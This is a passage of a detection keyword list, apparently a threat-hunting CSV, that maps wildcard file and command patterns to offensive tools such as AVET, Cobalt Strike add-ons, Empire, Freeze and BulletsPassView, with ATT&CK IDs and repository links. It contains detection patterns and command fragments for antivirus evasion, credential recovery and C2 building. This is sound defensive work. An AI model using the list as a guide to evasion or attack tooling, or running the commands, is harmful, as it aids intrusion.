-*bucketloot -*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,0,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot https://*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,0,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot.exe -*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,0,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot.exe https://*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,0,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot-darwin64*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot-freebsd64*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*BucketLoot-master*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot-openbsd64*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot-windows32.exe*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot-windows64.exe*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*buffer_overflow.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*bug: pid active in ptrace_sandbox_free*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*-Build $RandomAttackPath*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,0,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*build Freeze.go*,offensive_tool_keyword,Freeze,Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods,T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze,1,0,N/A,N/A,10,1333,166,2023-08-18T17:25:07Z,2022-09-21T14:40:59Z -*build SourcePoint.go*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,0,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*build Supernova.go*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*build.ps1 -commands * -profile *selfcontained -singlefile*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*build.ps1 -profiles * -commands * -compressed*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*build/breg.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,1,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*build_40xshikata_revhttpsunstaged_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_50xshikata_quiet_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_50xshikata_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_asciimsf_fromcmd_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_asciimsf_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_avetenc_dynamicfromfile_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_avetenc_fopen_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_avetenc_mtrprtrxor_revhttps_win64.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_c_shellcode*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*build_calcfromcmd_50xshikata_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_calcfrompowersh_50xshikata_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_checkdomain_rc4_mimikatz.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_disablewindefpsh_xorfromcmd_revhttps_win64.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_dkmc_downloadexecshc_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_downloadbitsadmin_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_downloadcertutil_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_downloadcurl_mtrprtrxor_revhttps_win64.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_sleep_rc4_mimikatz.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_svc_20xshikata_bindtcp_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*BuildBOFs.exe*,offensive_tool_keyword,cobaltstrike,C# .Net 5.0 project to build BOF (Beacon Object Files) in mass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ceramicskate0/BOF-Builder,1,1,N/A,10,10,23,3,2023-07-25T22:19:27Z,2021-09-07T01:28:11Z -*BuildBOFs.sln*,offensive_tool_keyword,cobaltstrike,C# .Net 5.0 project to build BOF (Beacon Object Files) in mass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ceramicskate0/BOF-Builder,1,1,N/A,10,10,23,3,2023-07-25T22:19:27Z,2021-09-07T01:28:11Z -*Building SYSTEM impersonation*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-MS16032.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*BulletsPassView.exe*,offensive_tool_keyword,bulletpassview,BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/bullets_password_view.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BulletsPassView.zip*,offensive_tool_keyword,bulletpassview,BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/bullets_password_view.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BulletsPassView_setup.exe*,offensive_tool_keyword,bulletpassview,BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/bullets_password_view.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*BulletsPassView_x64.exe*,offensive_tool_keyword,bulletpassview,BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/bullets_password_view.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*bully wlan1mon -b * -c 9 -S -F -B -v 3*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*bunny.deb.parrot.sh/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*bupload_raw*.dll*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 